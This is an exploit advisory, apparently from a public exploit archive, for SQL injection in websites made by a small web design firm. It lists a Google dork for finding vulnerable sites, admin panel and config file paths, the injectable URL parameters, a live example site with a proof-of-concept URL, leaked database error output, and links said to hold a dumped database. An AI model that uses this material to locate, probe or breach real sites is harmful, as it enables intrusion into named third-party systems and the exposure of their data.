facebook facebook twitter rss

Designed by Lang Web Solutions Mojoontap SQL Injection

Author: KingSkrupellos , Published: 08-10-2018

# Exploit Title : Designed by Lang Web Solutions Mojoontap SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : corey@mojoontap.com ~ mojoontap.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Designed by Lang Web Solutions''

# Admin Control Panel Login Path :

/admin/templates/admin/login.htm
/admin/

# SQL Injection Exploit :

/details.php?id=[SQL Injection]

/search.php?area=[SQL Injection]

# Configuration File Path : /admin/cfg.php

# SQL Database Dumped through /admin/db.sql => hastebin.com/raw/eruvijipov => archive.is/hdcHK

#################################################################################################

# Example Vulnerable Site => ajlang.org/details.php?id=405%27 => [ Proof of Concept ] => archive.is/BGTGW

# SQL Database Error =>

Warning: mysql_connect() [function.mysql-connect]: Unknown MySQL server host
'ajlangpm.dot5hostingmysql.com' (2) in /home/www/ajlang.org/admin/cfg.php on line 2
Could not connect MySQL

SELECT * FROM site_properties WHERE id='405''You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''405''' at line 1

SELECT * FROM site_properties WHERE `area`='7'' AND status=1 LIMIT 0,15You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''7'' AND status=1 LIMIT 0,15' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :